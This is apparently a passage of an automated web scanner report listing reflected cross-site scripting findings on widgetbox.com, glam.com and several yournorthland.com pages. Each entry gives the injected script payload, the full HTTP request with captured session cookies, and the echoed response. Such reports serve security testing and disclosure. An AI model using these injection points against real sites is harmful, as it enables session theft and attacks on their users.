<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>xss.cx R
...[SNIP]...
<a href="/de/review/xss.cx?9b905"><script>alert(1)</script>e953c895a=1">
...[SNIP]...

3.794. http://www.widgetbox.com/CatalogFeed/Stats [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.widgetbox.com
Path:	/CatalogFeed/Stats

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 94d17<img%20src%3da%20onerror%3dalert(1)>93b1888907b was submitted in the REST URL parameter 2. This input was echoed as 94d17<img src=a onerror=alert(1)>93b1888907b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /CatalogFeed/Stats94d17<img%20src%3da%20onerror%3dalert(1)>93b1888907b?callback=frontDoorStats HTTP/1.1
Host: www.widgetbox.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2123435684-1303854386635; km_ai=ZEtF5LlpqXlV9eDTnhh0xLfL3xw; km_lv=1303854422; km_uq=; JSESSIONID=8826B00681A512D7162BC5C4805C8F2F; __utmz=94870938.1303987046.2.2.utmcsr=widgetserver.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=94870938.1634222741.1303854385.1303854385.1303987046.2; __utmc=94870938; __utmb=94870938.1.10.1303987046

Response

HTTP/1.0 200 OK
Date: Thu, 28 Apr 2011 10:37:22 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Set-Cookie: node=1026; path=/
Connection: close
Content-Type: text/javascript

frontDoorStats({"percentChangeOfWidgetsphere":0,"search":"/Stats94d17<img src=a onerror=alert(1)>93b1888907b","caffeineIdx":0.8000000000000000444089209850062616169452667236328125,"domainsWidgetized":8243644,"numWidgets":238658,"hitStats":{"dayWidgetHits":0,"startValue":27266649091,"monthWidgetHits":831969760
...[SNIP]...

3.795. http://www35.glam.com/gad/glamadapt_psrv.act [;afid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www35.glam.com
Path:	/gad/glamadapt_psrv.act

Issue detail

The value of the ;afid request parameter is copied into the HTML document as plain text between tags. The payload 75370<script>alert(1)</script>8aeaaa465ef was submitted in the ;afid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gad/glamadapt_psrv.act?;afid=75370<script>alert(1)</script>8aeaaa465ef HTTP/1.1
Host: www35.glam.com
Proxy-Connection: keep-alive
Referer: http://www.mysimon.com/find/Moleskine+Ruled+Notebook+Large?tag=content;centerColumn
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 548
Content-Type: text/plain
ETag: "3becef5e38029bc3afd5aa4f7c81a714:1301986598"
X-Glam-Bdata: none
X-Glam-AdId: 1
X-Glam-Euid: c3ce45625e44747e91ba5991b16d8295
X-Powered-By: GlamAdapt/ASE/1.5
Vary: Accept-Encoding
Expires: Wed, 27 Apr 2011 23:18:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:18:42 GMT
Connection: close

/* Served by [rsapp9/172.30.0.13] for [www30a2.glam.com] at [Wed Apr 27 2011 16:18:42 P
...[SNIP]...
{ GlamAdaptSetInfo('srv_ad_id', 1);}
/* Invalid Request : Status = [sz= missing] Call = [_ge_=1^2^c3ce45625e44747e91ba5991b16d8295;ga_adb=ade;sid=116391130334874196611;browser=2;co=US;dma=511;;;;afid=75370<script>alert(1)</script>8aeaaa465ef;] */
/* rs = 17 */

window.glam_adapt_ase_rs = 17;

3.796. http://yournorthland.com/aboutUs/careers.asp [area parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://yournorthland.com
Path:	/aboutUs/careers.asp

Issue detail

The value of the area request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45cbc"><script>alert(1)</script>41a66e862ba was submitted in the area parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutUs/careers.asp?atype=&area=45cbc"><script>alert(1)</script>41a66e862ba&office=&rtCtr= HTTP/1.1
Host: yournorthland.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSABRASAT=LDJPBBDAIEMLBKIKNNAOOJGG; __utmz=19745767.1303935242.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=19745767.1159206364.1303935242.1303935242.1303935242.1; __utmc=19745767; __utmb=19745767.7.10.1303935242

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13094
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 27 Apr 2011 20:32:46 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<style type="text/css" media="screen">

...[SNIP]...
<a class="subLink" href="/services/cable/default.asp?atype=&area=45cbc"><script>alert(1)</script>41a66e862ba&office=&rtCtr=">
...[SNIP]...

3.797. http://yournorthland.com/aboutUs/careers.asp [atype parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://yournorthland.com
Path:	/aboutUs/careers.asp

Issue detail

The value of the atype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8837b"><script>alert(1)</script>59834465d87 was submitted in the atype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutUs/careers.asp?atype=8837b"><script>alert(1)</script>59834465d87&area=&office=&rtCtr= HTTP/1.1
Host: yournorthland.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSABRASAT=LDJPBBDAIEMLBKIKNNAOOJGG; __utmz=19745767.1303935242.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=19745767.1159206364.1303935242.1303935242.1303935242.1; __utmc=19745767; __utmb=19745767.7.10.1303935242

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13094
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 27 Apr 2011 20:32:39 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<style type="text/css" media="screen">

...[SNIP]...
<a class="subLink" href="/services/cable/default.asp?atype=8837b"><script>alert(1)</script>59834465d87&area=&office=&rtCtr=">
...[SNIP]...

3.798. http://yournorthland.com/aboutUs/careers.asp [office parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://yournorthland.com
Path:	/aboutUs/careers.asp

Issue detail

The value of the office request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70b31"><script>alert(1)</script>bdb72d01628 was submitted in the office parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutUs/careers.asp?atype=&area=&office=70b31"><script>alert(1)</script>bdb72d01628&rtCtr= HTTP/1.1
Host: yournorthland.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSABRASAT=LDJPBBDAIEMLBKIKNNAOOJGG; __utmz=19745767.1303935242.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=19745767.1159206364.1303935242.1303935242.1303935242.1; __utmc=19745767; __utmb=19745767.7.10.1303935242

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13094
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 27 Apr 2011 20:32:53 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<style type="text/css" media="screen">

...[SNIP]...
<a class="subLink" href="/services/cable/default.asp?atype=&area=&office=70b31"><script>alert(1)</script>bdb72d01628&rtCtr=">
...[SNIP]...

3.799. http://yournorthland.com/aboutUs/careers.asp [rtCtr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://yournorthland.com
Path:	/aboutUs/careers.asp

Issue detail

The value of the rtCtr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 383bf"><script>alert(1)</script>50ee084302e was submitted in the rtCtr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutUs/careers.asp?atype=&area=&office=&rtCtr=383bf"><script>alert(1)</script>50ee084302e HTTP/1.1
Host: yournorthland.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSABRASAT=LDJPBBDAIEMLBKIKNNAOOJGG; __utmz=19745767.1303935242.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=19745767.1159206364.1303935242.1303935242.1303935242.1; __utmc=19745767; __utmb=19745767.7.10.1303935242

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13094
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 27 Apr 2011 20:33:01 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<style type="text/css" media="screen">

...[SNIP]...
<a class="subLink" href="/services/cable/default.asp?atype=&area=&office=&rtCtr=383bf"><script>alert(1)</script>50ee084302e">
...[SNIP]...

3.800. http://yournorthland.com/aboutUs/eeo.asp [area parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://yournorthland.com
Path:	/aboutUs/eeo.asp

Issue detail

The value of the area request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70d6a"><script>alert(1)</script>ea88088a31f was submitted in the area parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutUs/eeo.asp?atype=&area=70d6a"><script>alert(1)</script>ea88088a31f&office=&rtCtr= HTTP/1.1
Host: yournorthland.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSABRASAT=LDJPBBDAIEMLBKIKNNAOOJGG; __utmz=19745767.1303935242.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=19745767.1159206364.1303935242.1303935242.1303935242.1; __utmc=19745767; __utmb=19745767.6.10.1303935242

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11936
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 27 Apr 2011 20:32:43 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<style type="text/css" media="screen">

...[SNIP]...
<a class="subLink" href="/services/cable/default.asp?atype=&area=70d6a"><script>alert(1)</script>ea88088a31f&office=&rtCtr=">
...[SNIP]...

3.801. http://yournorthland.com/aboutUs/eeo.asp [atype parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://yournorthland.com
Path:	/aboutUs/eeo.asp

Issue detail

The value of the atype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0296"><script>alert(1)</script>f0516589a69 was submitted in the atype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutUs/eeo.asp?atype=a0296"><script>alert(1)</script>f0516589a69&area=&office=&rtCtr= HTTP/1.1
Host: yournorthland.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSABRASAT=LDJPBBDAIEMLBKIKNNAOOJGG; __utmz=19745767.1303935242.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=19745767.1159206364.1303935242.1303935242.1303935242.1; __utmc=19745767; __utmb=19745767.6.10.1303935242

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11936
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 27 Apr 2011 20:32:35 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<style type="text/css" media="screen">

...[SNIP]...
<a class="subLink" href="/services/cable/default.asp?atype=a0296"><script>alert(1)</script>f0516589a69&area=&office=&rtCtr=">
...[SNIP]...

3.802. http://yournorthland.com/aboutUs/eeo.asp [office parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://yournorthland.com
Path:	/aboutUs/eeo.asp

Issue detail

The value of the office request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4c78"><script>alert(1)</script>8831106c8f8 was submitted in the office parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutUs/eeo.asp?atype=&area=&office=e4c78"><script>alert(1)</script>8831106c8f8&rtCtr= HTTP/1.1
Host: yournorthland.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSABRASAT=LDJPBBDAIEMLBKIKNNAOOJGG; __utmz=19745767.1303935242.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=19745767.1159206364.1303935242.1303935242.1303935242.1; __utmc=19745767; __utmb=19745767.6.10.1303935242

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11936
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 27 Apr 2011 20:32:50 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<style type="text/css" media="screen">

...[SNIP]...
<a class="subLink" href="/services/cable/default.asp?atype=&area=&office=e4c78"><script>alert(1)</script>8831106c8f8&rtCtr=">
...[SNIP]...

3.803. http://yournorthland.com/aboutUs/eeo.asp [rtCtr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://yournorthland.com
Path:	/aboutUs/eeo.asp

Issue detail

The value of the rtCtr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f9ea"><script>alert(1)</script>edc4ffc8a9d was submitted in the rtCtr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutUs/eeo.asp?atype=&area=&office=&rtCtr=2f9ea"><script>alert(1)</script>edc4ffc8a9d HTTP/1.1
Host: yournorthland.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSABRASAT=LDJPBBDAIEMLBKIKNNAOOJGG; __utmz=19745767.1303935242.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=19745767.1159206364.1303935242.1303935242.1303935242.1; __utmc=19745767; __utmb=19745767.6.10.1303935242

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11936
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 27 Apr 2011 20:32:58 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<style type="text/css" media="screen">

...[SNIP]...
<a class="subLink" href="/services/cable/default.asp?atype=&area=&office=&rtCtr=2f9ea"><script>alert(1)</script>edc4ffc8a9d">
...[SNIP]...

3.804. http://yournorthland.com/aboutUs/whoWeAre.asp [area parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://yournorthland.com
Path:	/aboutUs/whoWeAre.asp

Issue detail

The value of the area request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 417d0"><script>alert(1)</script>b4831402b5 was submitted in the area parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutUs/whoWeAre.asp?atype=&area=417d0"><script>alert(1)</script>b4831402b5&office=&rtCtr= HTTP/1.1
Host: yournorthland.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSABRASAT=LDJPBBDAIEMLBKIKNNAOOJGG; __utmz=19745767.1303935242.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=19745767.1159206364.1303935242.1303935242.1303935242.1; __utmc=19745767; __utmb=19745767.8.10.1303935242

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13092
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 27 Apr 2011 20:32:48 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<style type="text/css" media="screen">

...[SNIP]...
<a class="subLink" href="/services/cable/default.asp?atype=&area=417d0"><script>alert(1)</script>b4831402b5&office=&rtCtr=">
...[SNIP]...

3.805. http://yournorthland.com/aboutUs/whoWeAre.asp [atype parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://yournorthland.com
Path:	/aboutUs/whoWeAre.asp

Issue detail

The value of the atype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 727fe"><script>alert(1)</script>2b025fdc104 was submitted in the atype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutUs/whoWeAre.asp?atype=727fe"><script>alert(1)</script>2b025fdc104&area=&office=&rtCtr= HTTP/1.1
Host: yournorthland.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSABRASAT=LDJPBBDAIEMLBKIKNNAOOJGG; __utmz=19745767.1303935242.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=19745767.1159206364.1303935242.1303935242.1303935242.1; __utmc=19745767; __utmb=19745767.8.10.1303935242

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13106
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 27 Apr 2011 20:32:40 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<style type="text/css" media="screen">

...[SNIP]...
<a class="subLink" href="/services/cable/default.asp?atype=727fe"><script>alert(1)</script>2b025fdc104&area=&office=&rtCtr=">
...[SNIP]...

3.806. http://yournorthland.com/aboutUs/whoWeAre.asp [office parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://yournorthland.com
Path:	/aboutUs/whoWeAre.asp

Issue detail

The value of the office request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebac9"><script>alert(1)</script>16eb0e18f5f was submitted in the office parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutUs/whoWeAre.asp?atype=&area=&office=ebac9"><script>alert(1)</script>16eb0e18f5f&rtCtr= HTTP/1.1
Host: yournorthland.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSABRASAT=LDJPBBDAIEMLBKIKNNAOOJGG; __utmz=19745767.1303935242.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=19745767.1159206364.1303935242.1303935242.1303935242.1; __utmc=19745767; __utmb=19745767.8.10.1303935242

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13106
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 27 Apr 2011 20:32:56 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<style type="text/css" media="screen">

...[SNIP]...
<a class="subLink" href="/services/cable/default.asp?atype=&area=&office=ebac9"><script>alert(1)</script>16eb0e18f5f&rtCtr=">
...[SNIP]...

3.807. http://yournorthland.com/aboutUs/whoWeAre.asp [rtCtr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://yournorthland.com
Path:	/aboutUs/whoWeAre.asp

Issue detail

The value of the rtCtr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16068"><script>alert(1)</script>d7eec052c13 was submitted in the rtCtr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutUs/whoWeAre.asp?atype=&area=&office=&rtCtr=16068"><script>alert(1)</script>d7eec052c13 HTTP/1.1
Host: yournorthland.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSABRASAT=LDJPBBDAIEMLBKIKNNAOOJGG; __utmz=19745767.1303935242.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=19745767.1159206364.1303935242.1303935242.1303935242.1; __utmc=19745767; __utmb=19745767.8.10.1303935242

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13106
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 27 Apr 2011 20:33:04 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<style type="text/css" media="screen">

...[SNIP]...
<a class="subLink" href="/services/cable/default.asp?atype=&area=&office=&rtCtr=16068"><script>alert(1)</script>d7eec052c13">
...[SNIP]...

3.808. http://yournorthland.com/custHelp/paymentoptions.asp [area parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://yournorthland.com
Path:	/custHelp/paymentoptions.asp

Issue detail

The value of the area request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21485"><script>alert(1)</script>9807c2c50b7 was submitted in the area parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /custHelp/paymentoptions.asp?atype=&area=21485"><script>alert(1)</script>9807c2c50b7&office=&rtCtr= HTTP/1.1
Host: yournorthland.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSABRASAT=LDJPBBDAIEMLBKIKNNAOOJGG; __utmz=19745767.1303935242.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=19745767.1159206364.1303935242.1303935242.1303935242.1; __utmc=19745767; __utmb=19745767.3.10.1303935242

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10916
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 27 Apr 2011 20:32:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
